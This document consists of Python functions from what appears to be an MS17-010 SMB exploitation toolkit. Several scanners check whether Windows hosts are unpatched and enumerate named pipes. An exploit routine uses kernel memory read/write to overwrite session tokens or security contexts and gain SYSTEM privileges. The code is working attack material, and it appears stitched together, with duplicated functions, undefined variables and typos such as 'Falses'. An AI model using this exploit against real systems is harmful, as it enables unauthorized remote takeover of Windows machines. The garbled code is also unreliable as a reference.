def worawit(target): try: logger.blue('Connecting to: [{}]'.format(logger.BLUE(target))) try: conn = MYSMB(target, timeout=5) except: logger.red('Failed to connect to [{}]'.format(logger.RED(target))) return False try: conn.login(USERNAME, PASSWORD) except: logger.red('Authentication failed: [{}]'.format(logger.RED(nt_errors.ERROR_MESSAGES[e.error_code][0]))) quit() finally: logger.blue('Got OS: [{}]'.format(logger.BLUE(conn.get_server_os()))) tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$') conn.set_default_tid(tid) # test if target is vulnerable TRANS_PEEK_NMPIPE = 0x23 recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800) status = recvPkt.getNTStatus() if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES logger.green('[{}] IS NOT PATCHED!'.format(logger.GREEN(target))) else: logger.red('[{}] IS PATCHED!'.format(logger.RED(target))) quit() logger.blue('Checking named pipes...') for pipe_name, pipe_uuid in pipes.items(): try: dce = conn.get_dce_rpc(pipe_name) dce.connect() try: dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax) logger.green('\t-\t{}: OK (64 bit)'.format(logger.GREEN(pipe_name))) except DCERPCException as e: if 'transfer_syntaxes_not_supported' in str(e): logger.green('\t-\t{}: OK (32 bit)'.format(logger.GREEN(pipe_name))) else: logger.green('\t-\t{}: OK ({})'.format(logger.GREEN(pipe_name), str(e))) dce.disconnect() except smb.SessionError as e: logger.red('{}: {}'.format(logger.RED(pipe_name), logger.RED(nt_errors.ERROR_MESSAGES[e.error_code][0]))) except smbconnection.SessionError as e: logger.red('{}: {}'.format(logger.RED(pipe_name), logger.RED(nt_errors.ERROR_MESSAGES[e.error][0]))) conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close() except (KeyboardInterrupt, SystemExit): logger.red('Keyboard interrupt received..') quit()
def checker(host): try: conn = MYSMB(host) try: conn.login(USERNAME, PASSWORD) except smb.SessionError as e: logger.error('LOGIN FAILED: ' + nt_errors.ERROR_MESSAGES[e.error_code][0]) sys.exit() finally: logger.info('CONNECTED TO {}'.format(logger.BLUE(host))) logger.info('TARGET OS: ' + conn.get_server_os()) tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$') conn.set_default_tid(tid) # test if target is vulnerable TRANS_PEEK_NMPIPE = 0x23 recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800) status = recvPkt.getNTStatus() if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES logger.success('{} IS NOT PATCHED!'.format(logger.GREEN(target))) else: logger.error('{} IS PATCHED!'.format(target)) sys.exit() logger.action('CHECKING NAMED PIPES...') for pipe_name, pipe_uuid in pipes.items(): try: dce = conn.get_dce_rpc(pipe_name) dce.connect() try: dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax) logger.success('{}: OK (64 bit)'.format(pipe_name)) except DCERPCException as e: if 'transfer_syntaxes_not_supported' in str(e): logger.success('{}: OK (32 bit)'.format(pipe_name)) else: logger.success('{}: OK ({})'.format(pipe_name, str(e))) dce.disconnect() except smb.SessionError as e: logger.error('{}: {}'.format( pipe_name, nt_errors.ERROR_MESSAGES[e.error_code][0])) except smbconnection.SessionError as e: logger.error('{}: {}'.format( pipe_name, nt_errors.ERROR_MESSAGES[e.error][0])) conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close() except: logger.error('COULD NOT CONNECT TO {}'.format(logger.RED(host)))
def exploit(target,username,password,pipe_name): logger.blue('Connecting to: [{}]'.format(logger.BLUE(target))) conn = MYSMB(target) # set NODELAY to make exploit much faster conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) info = {} if len(username) == 0 and len(password) == 0: logger.blue('Attempting to authenticate with {}'.format(logger.BLUE('null sessions'))) else: logger.blue('Attempting to authenticate as {}:{}'.format(logger.BLUE(username),logger.BLUE(password))) try: conn.login(username,password,domain,maxBufferSize=4356) logger.green('Successfully authenticated as {}:{}'.format(logger.GREEN(username),logger.GREEN(password))) except Exception as e: logger.red(str(e)) quit() server_os = conn.get_server_os() logger.blue('OS: {}'.format(logger.BLUE(server_os))) if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"): # set the ['method'] to the appropriate exploit info['os'] = 'WIN7' info['method'] = exploit_matched_pairs elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10") or server_os.startswith("Windows RT 9200"): info['os'] = 'WIN8' info['method'] = exploit_matched_pairs elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith("Windows Vista") or server_os.startswith("Windows (R) Web Server 2008"): info['os'] = 'WIN7' info['method'] = exploit_fish_barrel elif server_os.startswith("Windows Server 2003 "): info['os'] = 'WIN2K3' info['method'] = exploit_fish_barrel elif server_os.startswith("Windows 5.1"): info['os'] = 'WINXP' info['arch'] = 'x86' info['method'] = exploit_fish_barrel elif server_os.startswith("Windows XP "): info['os'] = 'WINXP' info['arch'] = 'x64' info['method'] = exploit_fish_barrel elif server_os.startswith("Windows 5.0"): info['os'] = 'WIN2K' info['arch'] = 'x86' info['method'] = exploit_fish_barrel else: logger.red('Target isnt supported...') quit() logger.blue('Checking the named pipes...') if pipe_name is None: pipe_name = find_named_pipe(conn) if pipe_name is None: logger.red('Couldnt get named pipe...') return False logger.green('Using pipe: [{}]'.format(logger.GREEN(pipe_name))) if not info['method'](conn, pipe_name, info): # this then runs exploit_matched_pairs() return False # Now, read_data() and write_data() can be used for arbitrary read and write. # ================================ # Modify this SMB session to be SYSTEM # ================================ fmt = info['PTR_FMT'] logger.blue('Creating SYSTEM Session') # IsNullSession = 0, IsAdmin = 1 write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01') # read session struct to get SecurityContext address sessionData = read_data(conn, info, info['session'], 0x100) secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0] if 'PCTXTHANDLE_TOKEN_OFFSET' in info: # Windows 2003 and earlier uses only ImpersonateSecurityContext() (with PCtxtHandle struct) for impersonation # Modifying token seems to be difficult. But writing kernel shellcode for all old Windows versions is # much more difficult because data offset in ETHREAD/EPROCESS is different between service pack. # find the token and modify it if 'SECCTX_PCTXTHANDLE_OFFSET' in info: pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8) pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0] else: pctxtDataAddr = secCtxAddr tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8) tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0] logger.blue('Current Token Addr: 0x{:x}'.format(tokenAddr)) # copy Token data for restoration tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE']) # parse necessary data out of token userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData) logger.blue('Overwriting Token [UserAndGroups]') # modify UserAndGroups info fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr) if fakeUserAndGroupCount != userAndGroupCount: write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount)) write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups) else: # the target can use PsImperonateClient for impersonation (Windows 2008 and later) # copy SecurityContext for restoration secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE']) logger.blue('Overwriting session security context') # see FAKE_SECCTX detail at top of the file write_data(conn, info, secCtxAddr, info['FAKE_SECCTX']) # ================================ # do whatever we want as SYSTEM over this SMB connection # ================================ # try: smb_pwn(conn, info['arch']) # except: # pass # restore SecurityContext/Token if 'PCTXTHANDLE_TOKEN_OFFSET' in info: userAndGroupsOffset = userAndGroupsAddr - tokenAddr write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)]) if fakeUserAndGroupCount != userAndGroupCount: write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount)) else: write_data(conn, info, secCtxAddr, secCtxData) conn.disconnect_tree(conn.get_tid()) conn.logoff() conn.get_socket().close() return True
def worawit(target): try: try: conn = MYSMB(target, timeout=5) except: logger.red('Unable to connect to [{}]'.format(logger.RED(target))) return False try: conn.login(USERNAME, PASSWORD) except: logger.red('Failed to authenticate to [{}]'.format( logger.RED(target))) return False finally: try: OS = conn.get_server_os() except Exception as e: logger.red(str(e)) return False tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$') conn.set_default_tid(tid) # test if target is vulnerable TRANS_PEEK_NMPIPE = 0x23 recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800) status = recvPkt.getNTStatus() if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES logger.green('[%s] VULNERABLE' % logger.GREEN(target)) vulnerable[target] = [] else: logger.red('[%s] PATCHED' % logger.RED(target)) pipes_found = [] for pipe_name, pipe_uuid in pipes.items(): try: dce = conn.get_dce_rpc(pipe_name) dce.connect() try: dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax) try: pipes_found.append(pipe_name) except: pass except DCERPCException as e: if 'transfer_syntaxes_not_supported' in str(e): try: pipes_found.append(pipe_name) except: pass else: try: pipes_found.append(pipe_name) except: pass dce.disconnect() vulnerable[target] = pipes_found except smb.SessionError as e: continue except smbconnection.SessionError as e: continue conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close() except KeyboardInterrupt: logger.red('Keyboard interrupt received..') quit()
def run(target): try: try: logger.verbose('Attempting to connect to %s' % logger.BLUE(target)) conn = MYSMB(target, timeout=5) logger.verbose('Successfully connected to %s' % logger.BLUE(target)) except Exception as e: logger.red('Failed to connect to [{}]'.format(logger.RED(target))) logger.verbose('Got error whilst connecting: %s' % logger.BLUE(str(e))) return False try: # login(self, user, password, domain='', lmhash='', nthash='', ntlm_fallback=True, maxBufferSize=None) # can add passthehash at some point logger.verbose('Attempting to authenticate to %s' % logger.BLUE(target)) conn.login(username, password, domain) logger.verbose('Successfully authenticated to %s' % logger.BLUE(target)) except Exception as e: logger.red('Failed to authenticate to [{}]'.format( logger.RED(target))) return False try: logger.verbose('Attempting to get OS for %s' % logger.BLUE(target)) OS = conn.get_server_os() logger.verbose('Got Operting System: %s' % logger.BLUE(OS)) except Exception as e: logger.verbose('Got error whilst getting Operting System: %s' % logger.BLUE(str(e))) logger.red('Failed to obtain operating system') try: tree_connect_andx = '\\\\' + target + '\\' + 'IPC$' logger.verbose('Attempting to connect to %s' % logger.BLUE(tree_connect_andx)) tid = conn.tree_connect_andx(tree_connect_andx) conn.set_default_tid(tid) logger.verbose('Successfully connected to %s' % logger.BLUE(tree_connect_andx)) except Exception as e: logger.verbose('Got error whilst connecting to %s: %s' % (tree_connect_andx, logger.BLUE(str(e)))) return False # test if target is vulnerable logger.verbose('Testing if %s is vulnerable...' % logger.BLUE(target)) try: TRANS_PEEK_NMPIPE = 0x23 recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800) status = recvPkt.getNTStatus() if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES logger.green('[%s] VULNERABLE' % logger.GREEN(target)) vulnerable[target] = [] else: logger.red('[%s] PATCHED' % logger.RED(target)) except Exception as e: logger.verbose( 'Got error whilst checking vulnerability status %s' % logger.BLUE(str(e))) return Falses pipes_found = [] if target in vulnerable: logger.verbose('Checking pipes on %s' % logger.BLUE(target)) for pipe_name, pipe_uuid in pipes.items(): try: dce = conn.get_dce_rpc(pipe_name) dce.connect() try: dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax) try: pipes_found.append(pipe_name) except Exception as e: logger.verbose( 'Got error whilst appending pipe to list %s' % logger.BLUE(str(e))) pass except DCERPCException as e: logger.verbose('Got error whilst binding to rpc: %s' % logger.BLUE(str(e))) if 'transfer_syntaxes_not_supported' in str(e): try: pipes_found.append(pipe_name) except Exception as e: logger.verbose( 'Got error whilst appending pipe to list %s (transfer_syntaxes_not_supported)' % logger.BLUE(str(e))) pass else: try: pipes_found.append(pipe_name) except Exception as e: logger.verbose( 'Got error whilst appending pipe to list %s !(transfer_syntaxes_not_supported)' % logger.BLUE(str(e))) pass except Exception as e: logger.verbose('Got error whilst binding to rpc: %s' % logger.BLUE(str(e))) pass finally: dce.disconnect() vulnerable[target] = pipes_found except smb.SessionError as e: logger.verbose( 'Got SMB Session error whilst connecting %s' % logger.BLUE(str(e))) continue except smbconnection.SessionError as e: logger.verbose( 'Got SMB Session error whilst connecting %s' % logger.BLUE(str(e))) continue except Exception as e: logger.verbose( 'Got SMB Session error whilst connecting %s' % logger.BLUE(str(e))) continue try: conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close() except Exception as e: logger.verbose('Got error whilst disconnecting from rpc %s' % logger.BLUE(str(e))) pass except KeyboardInterrupt: logger.red('Keyboard interrupt received..') quit()